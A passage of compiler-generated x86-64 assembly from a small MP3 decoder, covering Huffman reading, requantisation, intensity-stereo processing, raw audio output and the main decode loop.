xmm0, eax mov esi, DWORD PTR -28[rbp] mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -28[rbp], 1 .L425: cmp DWORD PTR -28[rbp], 572 ja .L427 call Get_Main_Pos cmp DWORD PTR -16[rbp], eax jnb .L430 jmp .L427 .L436: nop jmp .L427 .L437: nop jmp .L427 .L438: nop .L427: call Get_Main_Pos mov edx, DWORD PTR -16[rbp] add edx, 1 cmp eax, edx jbe .L431 sub DWORD PTR -28[rbp], 4 .L431: mov edx, DWORD PTR -60[rbp] mov eax, DWORD PTR -56[rbp] add rax, rax add rax, rdx add rax, 80 lea rcx, 0[0+rax*4] lea rdx, g_side_info[rip+8] mov eax, DWORD PTR -28[rbp] mov DWORD PTR [rcx+rdx], eax jmp .L432 .L433: mov esi, DWORD PTR -28[rbp] mov eax, DWORD PTR -56[rbp] mov ecx, DWORD PTR -60[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] pxor xmm0, xmm0 movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -28[rbp], 1 .L432: cmp DWORD PTR -28[rbp], 575 jbe .L433 mov eax, DWORD PTR -16[rbp] add eax, 1 mov edi, eax call Set_Main_Pos nop .L413: mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L435 call __stack_chk_fail@PLT .L435: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE37: .size Read_Huffman, .-Read_Huffman .type Requantize_Process_Long, @function Requantize_Process_Long: .LFB38: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 48 mov DWORD PTR -36[rbp], edi mov DWORD PTR -40[rbp], esi mov DWORD PTR -44[rbp], edx mov DWORD PTR -48[rbp], ecx mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 72 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L440 movss xmm0, DWORD PTR .LC18[rip] jmp .L441 .L440: movss xmm0, DWORD PTR .LC28[rip] .L441: movss DWORD PTR -20[rbp], xmm0 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 68 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov eax, eax test rax, rax js .L442 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L443 .L442: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L443: mov eax, DWORD PTR -48[rbp] lea rdx, 0[0+rax*4] lea rax, pretab.5[rip] movss xmm1, DWORD PTR [rdx+rax] mulss xmm0, xmm1 movss DWORD PTR -16[rbp], xmm0 mov esi, DWORD PTR -48[rbp] mov edx, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax mov rdx, rcx sal rdx, 2 add rdx, rcx sal rdx, 2 add rdx, rcx add rax, rdx add rax, rsi lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov eax, DWORD PTR [rdx+rax] mov eax, eax test rax, rax js .L444 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L445 .L444: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L445: addss xmm0, DWORD PTR -16[rbp] mulss xmm0, DWORD PTR -20[rbp] movss xmm1, DWORD PTR .LC24[rip] xorps xmm0, xmm1 cvtss2sd xmm0, xmm0 mov rax, QWORD PTR .LC29[rip] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT cvtsd2ss xmm0, xmm0 movss DWORD PTR -12[rbp], xmm0 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 16 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] sub eax, 210 pxor xmm1, xmm1 cvtsi2sd xmm1, eax movsd xmm0, QWORD PTR .LC30[rip] mulsd xmm0, xmm1 mov rax, QWORD PTR .LC29[rip] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT cvtsd2ss xmm0, xmm0 movss DWORD PTR -8[rbp], xmm0 mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm1, DWORD PTR [rdx+rax] pxor xmm0, xmm0 comiss xmm0, xmm1 jbe .L451 mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] movss xmm1, DWORD PTR .LC24[rip] xorps xmm0, xmm1 cvttss2si rax, xmm0 mov edi, eax call Requantize_Pow_43 movd eax, xmm0 movss xmm0, DWORD PTR .LC24[rip] movd xmm2, eax xorps xmm2, xmm0 movaps xmm0, xmm2 movss DWORD PTR -24[rbp], xmm0 jmp .L448 .L451: mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] cvttss2si rax, xmm0 mov edi, eax call Requantize_Pow_43 movd eax, xmm0 mov DWORD PTR -24[rbp], eax .L448: movss xmm0, DWORD PTR -12[rbp] mulss xmm0, DWORD PTR -8[rbp] mulss xmm0, DWORD PTR -24[rbp] mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] movss DWORD PTR -4[rbp], xmm0 nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE38: .size Requantize_Process_Long, .-Requantize_Process_Long .type Requantize_Process_Short, @function Requantize_Process_Short: .LFB39: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 64 mov DWORD PTR -36[rbp], edi mov DWORD PTR -40[rbp], esi mov DWORD PTR -44[rbp], edx mov DWORD PTR -48[rbp], ecx mov DWORD PTR -52[rbp], r8d mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 72 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] test eax, eax je .L453 movss xmm0, DWORD PTR .LC18[rip] jmp .L454 .L453: movss xmm0, DWORD PTR .LC28[rip] .L454: movss DWORD PTR -20[rbp], xmm0 mov edi, DWORD PTR -52[rbp] mov edx, DWORD PTR -40[rbp] mov esi, DWORD PTR -48[rbp] mov ecx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 mov rdx, rsi add rdx, rdx add rdx, rsi add rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 3 add rax, rdx add rax, rdi add rax, 84 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov eax, DWORD PTR [rdx+rax] mov eax, eax test rax, rax js .L455 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L456 .L455: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L456: mulss xmm0, DWORD PTR -20[rbp] movss xmm1, DWORD PTR .LC24[rip] xorps xmm0, xmm1 cvtss2sd xmm0, xmm0 mov rax, QWORD PTR .LC29[rip] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT cvtsd2ss xmm0, xmm0 movss DWORD PTR -16[rbp], xmm0 mov edx, DWORD PTR -40[rbp] mov eax, DWORD PTR -36[rbp] add rax, rax add rax, rdx add rax, 16 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov eax, eax test rax, rax js .L457 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L458 .L457: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L458: movss xmm2, DWORD PTR .LC31[rip] movaps xmm1, xmm0 subss xmm1, xmm2 mov esi, DWORD PTR -52[rbp] mov edx, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rax, rdx add rax, rax add rax, rdx add rax, rax mov rdx, rcx add rdx, rdx add rdx, rcx add rax, rdx add rax, rsi add rax, 48 lea rdx, 0[0+rax*4] lea rax, g_side_info[rip+8] mov eax, DWORD PTR [rdx+rax] mov eax, eax test rax, rax js .L459 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L460 .L459: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L460: movss xmm2, DWORD PTR .LC32[rip] mulss xmm0, xmm2 subss xmm1, xmm0 movss xmm0, DWORD PTR .LC33[rip] mulss xmm0, xmm1 cvtss2sd xmm0, xmm0 mov rax, QWORD PTR .LC29[rip] movapd xmm1, xmm0 movq xmm0, rax call pow@PLT cvtsd2ss xmm0, xmm0 movss DWORD PTR -12[rbp], xmm0 mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm1, DWORD PTR [rdx+rax] pxor xmm0, xmm0 comiss xmm0, xmm1 jbe .L466 mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] movss xmm1, DWORD PTR .LC24[rip] xorps xmm0, xmm1 cvttss2si rax, xmm0 mov edi, eax call Requantize_Pow_43 movd eax, xmm0 movss xmm0, DWORD PTR .LC24[rip] movd xmm3, eax xorps xmm3, xmm0 movd eax, xmm3 jmp .L463 .L466: mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] cvttss2si rax, xmm0 mov edi, eax call Requantize_Pow_43 movd eax, xmm0 .L463: mov DWORD PTR -8[rbp], eax movss xmm0, DWORD PTR -16[rbp] mulss xmm0, DWORD PTR -12[rbp] mulss xmm0, DWORD PTR -8[rbp] mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss DWORD PTR [rdx+rax], xmm0 mov esi, DWORD PTR -44[rbp] mov eax, DWORD PTR -36[rbp] mov ecx, DWORD PTR -40[rbp] mov rdx, rax sal rdx, 3 add rdx, rax mov rax, rdx sal rax, 7 mov rdx, rax mov rax, rcx sal rax, 3 add rax, rcx sal rax, 6 add rax, rdx add rax, rsi add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] movss DWORD PTR -4[rbp], xmm0 nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE39: .size Requantize_Process_Short, .-Requantize_Process_Short .type Stereo_Process_Intensity_Long, @function Stereo_Process_Intensity_Long: .LFB40: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -52[rbp], edi mov DWORD PTR -56[rbp], esi mov ecx, DWORD PTR -56[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 2 add rax, rdx sal rax, 2 add rax, rdx add rax, rax add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -24[rbp], eax cmp DWORD PTR -24[rbp], 7 je .L474 mov eax, DWORD PTR g_frame_header[rip+16] mov DWORD PTR -20[rbp], eax mov ecx, DWORD PTR -56[rbp] mov edx, DWORD PTR -20[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -16[rbp], eax mov eax, DWORD PTR -56[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -20[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -12[rbp], eax cmp DWORD PTR -24[rbp], 6 jne .L469 movss xmm0, DWORD PTR .LC18[rip] movss DWORD PTR -32[rbp], xmm0 pxor xmm0, xmm0 movss DWORD PTR -28[rbp], xmm0 jmp .L470 .L469: mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, is_ratios[rip] movss xmm0, DWORD PTR [rdx+rax] mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, is_ratios[rip] movss xmm2, DWORD PTR [rdx+rax] movss xmm1, DWORD PTR .LC18[rip] addss xmm1, xmm2 divss xmm0, xmm1 movss DWORD PTR -32[rbp], xmm0 mov eax, DWORD PTR -24[rbp] lea rdx, 0[0+rax*4] lea rax, is_ratios[rip] movss xmm1, DWORD PTR [rdx+rax] movss xmm0, DWORD PTR .LC18[rip] addss xmm1, xmm0 movss xmm0, DWORD PTR .LC18[rip] divss xmm0, xmm1 movss DWORD PTR -28[rbp], xmm0 .L470: mov eax, DWORD PTR -16[rbp] mov DWORD PTR -36[rbp], eax jmp .L471 .L472: mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] movss xmm1, DWORD PTR -32[rbp] mulss xmm0, xmm1 movss DWORD PTR -8[rbp], xmm0 mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] movss xmm1, DWORD PTR -28[rbp] mulss xmm0, xmm1 movss DWORD PTR -4[rbp], xmm0 mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -8[rbp] movss DWORD PTR [rdx+rax], xmm0 mov ecx, DWORD PTR -36[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 804 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -4[rbp] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -36[rbp], 1 .L471: mov eax, DWORD PTR -36[rbp] cmp eax, DWORD PTR -12[rbp] jb .L472 nop .L474: nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE40: .size Stereo_Process_Intensity_Long, .-Stereo_Process_Intensity_Long .type Stereo_Process_Intensity_Short, @function Stereo_Process_Intensity_Short: .LFB41: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov DWORD PTR -52[rbp], edi mov DWORD PTR -56[rbp], esi mov eax, DWORD PTR g_frame_header[rip+16] mov DWORD PTR -36[rbp], eax mov eax, DWORD PTR -56[rbp] add eax, 1 mov ecx, eax mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov ecx, DWORD PTR [rdx+rax] mov esi, DWORD PTR -56[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rsi add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, ecx sub eax, edx mov DWORD PTR -32[rbp], eax mov DWORD PTR -40[rbp], 0 jmp .L476 .L486: mov esi, DWORD PTR -40[rbp] mov edx, DWORD PTR -52[rbp] mov ecx, DWORD PTR -56[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 3 mov rdx, rcx add rdx, rdx add rdx, rcx add rax, rdx add rax, rsi add rax, 84 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] mov eax, DWORD PTR [rdx+rax] mov DWORD PTR -28[rbp], eax cmp DWORD PTR -28[rbp], 7 je .L477 mov ecx, DWORD PTR -56[rbp] mov edx, DWORD PTR -36[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 2 add rax, rdx add rax, rcx add rax, 20 lea rdx, 0[0+rax*4] lea rax, g_sf_band_indices[rip+12] mov edx, DWORD PTR [rdx+rax] mov eax, edx add eax, eax add edx, eax mov eax, DWORD PTR -32[rbp] imul eax, DWORD PTR -40[rbp] add eax, edx mov DWORD PTR -24[rbp], eax mov edx, DWORD PTR -24[rbp] mov eax, DWORD PTR -32[rbp] add eax, edx mov DWORD PTR -20[rbp], eax cmp DWORD PTR -28[rbp], 6 jne .L478 mov DWORD PTR -16[rbp], 1 mov DWORD PTR -12[rbp], 0 jmp .L479 .L478: mov eax, DWORD PTR -28[rbp] lea rdx, 0[0+rax*4] lea rax, is_ratios[rip] movss xmm0, DWORD PTR [rdx+rax] cvtss2sd xmm0, xmm0 mov eax, DWORD PTR -28[rbp] lea rdx, 0[0+rax*4] lea rax, is_ratios[rip] movss xmm1, DWORD PTR [rdx+rax] pxor xmm2, xmm2 cvtss2sd xmm2, xmm1 movsd xmm1, QWORD PTR .LC34[rip] addsd xmm1, xmm2 divsd xmm0, xmm1 cvttsd2si rax, xmm0 mov DWORD PTR -16[rbp], eax mov eax, DWORD PTR -28[rbp] lea rdx, 0[0+rax*4] lea rax, is_ratios[rip] movss xmm0, DWORD PTR [rdx+rax] pxor xmm1, xmm1 cvtss2sd xmm1, xmm0 movsd xmm0, QWORD PTR .LC34[rip] addsd xmm1, xmm0 movsd xmm0, QWORD PTR .LC34[rip] divsd xmm0, xmm1 cvttsd2si rax, xmm0 mov DWORD PTR -12[rbp], eax .L479: mov eax, DWORD PTR -24[rbp] mov DWORD PTR -44[rbp], eax jmp .L480 .L485: mov ecx, DWORD PTR -44[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] cvttss2si rax, xmm0 mov DWORD PTR -16[rbp], eax mov eax, DWORD PTR -16[rbp] test rax, rax js .L481 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L482 .L481: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L482: movss DWORD PTR -8[rbp], xmm0 mov ecx, DWORD PTR -44[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR [rdx+rax] cvttss2si rax, xmm0 mov DWORD PTR -12[rbp], eax mov eax, DWORD PTR -12[rbp] test rax, rax js .L483 pxor xmm0, xmm0 cvtsi2ss xmm0, rax jmp .L484 .L483: mov rdx, rax shr rdx and eax, 1 or rdx, rax pxor xmm0, xmm0 cvtsi2ss xmm0, rdx addss xmm0, xmm0 .L484: movss DWORD PTR -4[rbp], xmm0 mov ecx, DWORD PTR -44[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 228 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -8[rbp] movss DWORD PTR [rdx+rax], xmm0 mov ecx, DWORD PTR -44[rbp] mov edx, DWORD PTR -52[rbp] mov rax, rdx sal rax, 3 add rax, rdx sal rax, 7 add rax, rcx add rax, 804 lea rdx, 0[0+rax*4] lea rax, g_main_data[rip] movss xmm0, DWORD PTR -4[rbp] movss DWORD PTR [rdx+rax], xmm0 add DWORD PTR -44[rbp], 1 .L480: mov eax, DWORD PTR -44[rbp] cmp eax, DWORD PTR -20[rbp] jb .L485 .L477: add DWORD PTR -40[rbp], 1 .L476: cmp DWORD PTR -40[rbp], 2 jbe .L486 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE41: .size Stereo_Process_Intensity_Short, .-Stereo_Process_Intensity_Short .type audio_write, @function audio_write: .LFB42: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 mov QWORD PTR -24[rbp], rdi mov DWORD PTR -28[rbp], esi mov DWORD PTR -32[rbp], edx mov DWORD PTR -12[rbp], 16 mov DWORD PTR -8[rbp], 44100 mov DWORD PTR -4[rbp], 2 nop pop rbp .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE42: .size audio_write, .-audio_write .section .rodata .LC35: .string "%s.raw" .LC36: .string "Unable to write raw data\n" .text .type audio_write_raw, @function audio_write_raw: .LFB43: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 3376 mov QWORD PTR -3368[rbp], rdi mov DWORD PTR -3372[rbp], esi mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, DWORD PTR init.1[rip] test eax, eax jne .L491 mov DWORD PTR init.1[rip], 1 mov rax, QWORD PTR filename[rip] lea rsi, .LC11[rip] mov rdi, rax call strcmp@PLT test eax, eax je .L492 mov rdx, QWORD PTR filename[rip] lea rax, -1040[rbp] lea rsi, .LC35[rip] mov rdi, rax mov eax, 0 call sprintf@PLT lea rax, -1040[rbp] mov edx, 438 mov esi, 65 mov rdi, rax mov eax, 0 call open@PLT mov DWORD PTR fd.0[rip], eax mov eax, DWORD PTR fd.0[rip] cmp eax, -1 jne .L491 lea rax, -1040[rbp] mov rdi, rax call perror@PLT mov edi, -1 call exit@PLT .L492: mov DWORD PTR fd.0[rip], 1 .L491: mov eax, DWORD PTR g_frame_header[rip+28] cmp eax, 3 jne .L493 mov eax, 1 jmp .L494 .L493: mov eax, 2 .L494: mov DWORD PTR -3356[rbp], eax mov DWORD PTR -3360[rbp], 0 jmp .L495 .L498: cmp DWORD PTR -3356[rbp], 1 jne .L496 mov eax, DWORD PTR -3360[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -3368[rbp] add rax, rdx mov eax, DWORD PTR [rax] and eax, 65535 mov DWORD PTR -3352[rbp], eax mov eax, DWORD PTR -3352[rbp] mov edx, eax mov eax, DWORD PTR -3360[rbp] cdqe mov WORD PTR -3344[rbp+rax*2], dx jmp .L497 .L496: mov eax, DWORD PTR -3360[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -3368[rbp] add rax, rdx mov eax, DWORD PTR [rax] and eax, 65535 mov DWORD PTR -3352[rbp], eax mov eax, DWORD PTR -3360[rbp] cdqe lea rdx, 0[0+rax*4] mov rax, QWORD PTR -3368[rbp] add rax, rdx mov eax, DWORD PTR [rax] shr eax, 16 mov DWORD PTR -3348[rbp], eax mov eax, DWORD PTR -3360[rbp] lea edx, [rax+rax] mov eax, DWORD PTR -3348[rbp] mov ecx, eax movsx rax, edx mov WORD PTR -3344[rbp+rax*2], cx mov eax, DWORD PTR -3360[rbp] add eax, eax lea edx, 1[rax] mov eax, DWORD PTR -3352[rbp] mov ecx, eax movsx rax, edx mov WORD PTR -3344[rbp+rax*2], cx .L497: add DWORD PTR -3360[rbp], 1 .L495: mov eax, DWORD PTR -3360[rbp] cmp DWORD PTR -3372[rbp], eax ja .L498 mov eax, DWORD PTR -3356[rbp] imul eax, DWORD PTR -3372[rbp] add eax, eax mov edx, eax mov eax, DWORD PTR fd.0[rip] lea rcx, -3344[rbp] mov rsi, rcx mov edi, eax call write@PLT mov edx, DWORD PTR -3356[rbp] imul edx, DWORD PTR -3372[rbp] add edx, edx mov edx, edx cmp rax, rdx je .L502 mov esi, -1 lea rdi, .LC36[rip] call Error nop .L502: nop mov rax, QWORD PTR -8[rbp] sub rax, QWORD PTR fs:40 je .L501 call __stack_chk_fail@PLT .L501: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE43: .size audio_write_raw, .-audio_write_raw .section .rodata .align 8 .LC37: .string "Not enough maindata to decode frame\n" .text .globl pdmp3 .type pdmp3, @function pdmp3: .LFB44: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 16 mov QWORD PTR -8[rbp], rdi mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] mov edx, 8 mov rsi, rax lea rdi, .LC0[rip] call strncmp@PLT test eax, eax jne .L505 mov rax, QWORD PTR -8[rbp] lea rdx, 8[rax] mov QWORD PTR -8[rbp], rdx mov rax, QWORD PTR [rax] mov QWORD PTR audio_name[rip], rax jmp .L505 .L511: mov rax, QWORD PTR -8[rbp] lea rdx, 8[rax] mov QWORD PTR -8[rbp], rdx mov rax, QWORD PTR [rax] mov QWORD PTR filename[rip], rax jmp .L506 .L510: call Read_Frame test eax, eax jne .L507 call Decode_L3 jmp .L506 .L507: call Get_Filepos cmp eax, -1 je .L512 mov rax, QWORD PTR stderr[rip] mov rcx, rax mov edx, 36 mov esi, 1 lea rdi, .LC37[rip] call fwrite@PLT mov rax, QWORD PTR stderr[rip] mov rsi, rax mov edi, 10 call fputc@PLT .L506: call Get_Filepos cmp eax, -1 jne .L510 jmp .L509 .L512: nop .L509: call Close_File .L505: mov rax, QWORD PTR -8[rbp] mov rax, QWORD PTR [rax] test rax, rax jne .L511 nop nop leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE44: .size pdmp3, .-pdmp3 .data .align 4 .type init.11, @object .size init.11, 4 init.11: .long 1 .local g_imdct_win.10 .comm g_imdct_win.10,576,32 .local store.9 .comm store.9,4608,32 .align 4 .type init.8, @object .size init.8, 4 init.8: .long 1 .local g_synth_n_win.7 .comm g_synth_n_win.7,8192,32 .local v_vec.6 .comm v_vec.6,8192,32 .align 32 .type pretab.5, @object .size 